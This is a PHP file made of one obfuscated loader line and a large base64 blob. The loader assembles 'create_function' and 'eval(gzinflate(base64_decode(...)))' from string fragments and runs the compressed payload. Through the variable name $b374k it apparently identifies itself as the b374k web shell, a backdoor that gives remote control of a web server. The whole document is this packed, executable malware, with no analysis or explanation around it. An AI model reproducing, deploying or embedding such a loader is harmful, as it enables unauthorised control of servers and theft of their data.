10$func="cr"."eat"."e_fun"."cti"."on";$b374k=$func('$x','ev'.'al'.'("?>".gz'.'in'.'fla'.'te(ba'.'se'.'64'.'_de'.'co'.'de($x)));');$b374k("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